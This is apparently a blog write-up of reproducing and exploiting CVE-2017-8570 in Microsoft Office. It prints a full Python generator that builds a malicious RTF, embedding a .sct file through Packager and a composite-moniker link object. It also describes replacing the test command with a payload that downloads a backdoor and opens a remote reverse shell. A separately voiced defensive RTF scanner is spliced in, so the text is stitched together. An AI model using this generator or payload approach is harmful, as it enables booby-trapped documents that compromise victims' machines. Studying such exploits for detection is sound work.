CVE-2017-8570: Reproducing and Exploiting a Microsoft Office Logic Vulnerability

Vulnerability overview

CVE-2017-8570 is another logic vulnerability in Microsoft Office that followed CVE-2017-0199; it is also known as "Sandworm II". Compared with CVE-2017-0199 it is easier to exploit and affects a wider range of versions.

Affected versions
Microsoft Office 2016
Microsoft Office 2013
Microsoft Office 2010
Microsoft Office 2007

Lab environment

Microsoft Office 2010

Win7 SP1 32bit

Reproduction process (so to speak)

Two variants circulate online, a PPSX one and an RTF one. The PPSX variant is far more common, and most blog write-ups reproduce that version. In the article "CVE-2017-8570首次公開的野外樣本及漏洞分析" (analysis of the first publicly disclosed in-the-wild sample) I saw the exploitation process for the RTF variant, together with the malicious RTF document generator on GitHub. The script is as follows:

import argparse
import os
import struct
import random
import string

class Package(object):
    """
    Packager spec based on:
    https://phishme.com/rtf-malware-delivery/
    
    Dropping method by Haifei Li: 
    https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/

    Found being used itw by @MalwareParty:
    https://twitter.com/MalwareParty/status/943861021260861440
    """
    def __init__(self, filename):
        self.filename = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(15)) + '.sct'
        self.fakepath = 'C:\\fakepath\\{}'.format(self.filename)

        self.orgpath = self.fakepath
        self.datapath = self.fakepath

        with open(filename,'rb') as f:
            self.data = f.read()

        self.OBJ_HEAD = r"{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata "
        self.OBJ_TAIL = r"0105000000000000}}"

    def get_object_header(self):
        OLEVersion = '01050000'
        FormatID = '02000000'
        ClassName = 'Package'
        szClassName = struct.pack("<I", len(ClassName) + 1).encode('hex')
        szPackageData = struct.pack("<I", len(self.get_package_data())/2).encode('hex')

        return ''.join([
            OLEVersion,
            FormatID,
            szClassName,
            ClassName.encode('hex') + '00',
            '00000000',
            '00000000',
            szPackageData,
        ])

    def get_package_data(self):  
        StreamHeader = '0200'
        Label = self.filename.encode('hex') + '00'
        OrgPath = self.orgpath.encode('hex') + '00'
        UType = '00000300'
        DataPath = self.datapath.encode('hex') + '00'
        DataPathLen = struct.pack("<I", len(self.datapath)+1).encode('hex')
        DataLen = struct.pack("<I", len(self.data)).encode('hex')
        Data = self.data.encode('hex')
        OrgPathWLen = struct.pack("<I", len(self.datapath)).encode('hex')
        OrgPathW = self.datapath.encode('utf-16le').encode('hex')
        LabelLen = struct.pack("<I", len(self.filename)).encode('hex')
        LabelW = self.filename.encode('utf-16le').encode('hex')
        DefPathWLen = struct.pack("<I", len(self.orgpath)).encode('hex')
        DefPathW = self.orgpath.encode('utf-16le').encode('hex')

        return ''.join([
            StreamHeader,
            Label,
            OrgPath,
            UType,
            DataPathLen,
            DataPath,
            DataLen,
            Data,
            OrgPathWLen,
            OrgPathW,
            LabelLen,
            LabelW,
            DefPathWLen,
            DefPathW,
        ])

    def build_package(self):
        return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL

# Bypassing CVE-2017-0199 patch with Composite Moniker: https://justhaifei1.blogspot.co.uk/2017/07/bypassing-microsofts-cve-2017-0199-patch.html
EXPLOIT_RTF = r"""{{\rt{0}{{\object\objautlink\objupdate{{\*\objclass Word.Document.8}}{{\*\objdata 0105000002000000090000004F4C45324C696E6B000000000000000000000A0000D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFFFEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF020000000003000000000000C000000000000046000000000000000000000000704D6CA637B5D20103000000000200000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000100100000000000003004F0062006A0049006E0066006F00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000060000000000000003004C0069006E006B0049006E0066006F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000005000000B700000000000000010000000200000003000000FEFFFFFFFEFFFFFF0600000007000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020900000001000000000000000000000000000000C00000000903000000000000C000000000000046020000000303000000000000C00000000000004600001A00000025544D50255C{1}000E00ADDE000000000000000000000000000000000000000038000000320000000300250054004D00500025005C00{2}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}}}}}}"""


def build_exploit(sct):
    p = Package(sct)
    package = p.build_package()
    return EXPLOIT_RTF.format(package, p.filename.encode('hex'), p.filename.encode('utf-16le').encode('hex'))

    
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PoC exploit for CVE-2017-8750 (a.k.a. \"composite moniker\") using Packager.dll file drop method")
    parser.add_argument("-s", "--sct", help="Sct file to execute", required=True)
    parser.add_argument('-o', "--output", help="Output file for RTF", default = "example.rtf")

    args = parser.parse_args()

    with open(args.output, 'w') as f:
        f.write(build_exploit(args.sct))    
    print "[+] RTF file written to: {}".format(args.output)

Reproducing the bug is not hard. Unlike CVE-2017-0199 there is no server to set up: you only need to build a local .sct file that executes a command, then hex-encode it and write it into the document following the RTF format. In practice this is just walking through the steps in the author's GitHub repository (runs away).
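As a defender-side counterpart to the generator above, here is an added example (my code, not part of the original post and not from the GitHub PoC) that does the reverse job: it scans an RTF for embedded OLE "Package" objects, walks the same OLE 1.0 object header and Packager stream layout the generator writes, recovers the dropped file's label, recorded paths and bytes, and flags labels with scripting or executable extensions. It also carries a heuristic for the auto-updating Word.Document.8 link object that the generator's RTF template uses as its trigger. The function names, the extension list, the heuristic and the build_sample_rtf input are all my assumptions; the sample RTF is constructed inline with a harmless text payload purely so the script runs offline.

```python
"""Scan an RTF for embedded OLE 'Package' objects and recover the dropped file.

The OLE 1.0 header / Packager stream layout follows the generator shown on this
page; the names, heuristics and the constructed sample input are assumptions.
"""
import re
import struct

# Extensions a Packager drop into %TMP% should never legitimately need (assumed list).
SUSPICIOUS_EXTS = {".sct", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta",
                   ".exe", ".dll", ".scr"}

# {\*\objclass <name>}{\*\objdata <hex>}  -- the pair the generator emits per object
OBJ_RE = re.compile(r"\{\\\*\\objclass\s+([^}]+)\}\s*\{\\\*\\objdata\s*([0-9A-Fa-f\s]+)\}")


def _cstr(buf, off):
    """Read a NUL-terminated ANSI string at off; return (text, offset after the NUL)."""
    end = buf.index(b"\x00", off)
    return buf[off:end].decode("latin-1"), end + 1


def parse_package(blob):
    """Parse OLE1 object header + Packager stream; return the embedded file's metadata."""
    _ole_version, format_id = struct.unpack_from("<II", blob, 0)
    if format_id != 2:                      # 2 = embedded object
        raise ValueError("not an embedded OLE1 object")
    name_len = struct.unpack_from("<I", blob, 8)[0]
    class_name = blob[12:12 + name_len].rstrip(b"\x00").decode("latin-1")
    if class_name != "Package":
        raise ValueError("objclass is not Package: %r" % class_name)
    off = 12 + name_len + 8                 # skip the two reserved dwords
    stream_len = struct.unpack_from("<I", blob, off)[0]
    stream = blob[off + 4:off + 4 + stream_len]
    if stream[:2] != b"\x02\x00":
        raise ValueError("unexpected Packager stream header")
    label, p = _cstr(stream, 2)             # file name Packager shows and writes to %TMP%
    org_path, p = _cstr(stream, p)          # original path recorded by Packager
    p += 4                                  # UType
    data_path_len = struct.unpack_from("<I", stream, p)[0]
    p += 4
    data_path = stream[p:p + data_path_len].rstrip(b"\x00").decode("latin-1")
    p += data_path_len
    data_len = struct.unpack_from("<I", stream, p)[0]
    p += 4
    return {"label": label, "org_path": org_path, "data_path": data_path,
            "data": stream[p:p + data_len]}


def scan_rtf(rtf):
    """Return one finding per OLE object in the RTF, flagging risky Package drops."""
    findings = []
    for objclass, hexdata in OBJ_RE.findall(rtf):
        blob = bytes.fromhex(re.sub(r"\s+", "", hexdata))
        finding = {"objclass": objclass, "package": None, "suspicious": False}
        if objclass == "Package":
            pkg = parse_package(blob)
            label = pkg["label"]
            ext = label[label.rfind("."):].lower() if "." in label else ""
            finding["package"] = pkg
            finding["suspicious"] = ext in SUSPICIOUS_EXTS
        findings.append(finding)
    return findings


def has_composite_moniker_trigger(rtf):
    """Heuristic (assumed) for the trigger used by the template above: an auto-updating
    Word.Document.8 link object in the same document as a Package object."""
    return ("\\objautlink" in rtf and "\\objupdate" in rtf
            and "Word.Document.8" in rtf and "objclass Package" in rtf)


def build_sample_rtf(label, payload):
    """Constructed test input only: a minimal RTF with one Package object in the
    layout parsed above (ANSI fields only, no Unicode tail, no link object)."""
    path = "C:\\fakepath\\" + label
    stream = (b"\x02\x00" + label.encode() + b"\x00" + path.encode() + b"\x00"
              + b"\x00\x00\x03\x00"
              + struct.pack("<I", len(path) + 1) + path.encode() + b"\x00"
              + struct.pack("<I", len(payload)) + payload)
    cls = b"Package\x00"
    header = (b"\x01\x05\x00\x00" + struct.pack("<I", 2)
              + struct.pack("<I", len(cls)) + cls
              + b"\x00" * 8 + struct.pack("<I", len(stream)))
    return ("{\\rtf1{\\object\\objemb\\objw1\\objh1{\\*\\objclass Package}{\\*\\objdata "
            + (header + stream).hex() + "0105000000000000}}}")


if __name__ == "__main__":
    sample = build_sample_rtf("QWERTY.sct", b"constructed harmless text")
    for f in scan_rtf(sample):
        pkg = f["package"]
        print(f["objclass"], pkg["label"] if pkg else "-",
              "SUSPICIOUS" if f["suspicious"] else "ok")
    print("composite moniker trigger:", has_composite_moniker_trigger(sample))
```

Run against a real document, the interesting output is the recovered label and bytes: the label tells you what Packager will write into %TMP%, and the bytes can go straight to a hash lookup or a sandbox. A parser that only keys on the .sct extension would miss renamed payloads, so treat the extension flag as a triage hint and the extracted bytes as the evidence.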

poc.sct

Reproduction successful

Exploitation process (the simple version)

The idea is the same as with CVE-2017-0199 last time: since we already have command execution, exploitation only requires replacing the command executed in poc.sct (calc) with the attack payload, which downloads the backdoor file from the server into the local %tmp% directory and runs it.

poc.sct

exp.sct

Resolved to the tmp directory and downloaded the backdoor

Executing the backdoor file

Remote reverse shell

寫在后面

This reproduction of a logic vulnerability did not go down to the code level; it mainly followed the exploits already published online to build some simple attack scripts, and I picked up a few lines of VBS along the way. The article "海蓮花APT團伙利用CVE-2017-8570漏洞的新樣本及關聯分析" (new samples from the OceanLotus APT group exploiting CVE-2017-8570, with related analysis) shows a more advanced exploitation technique; when I have time I want to study the structure of RTF files. The PPSX version of the exploit is also on GitHub.

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容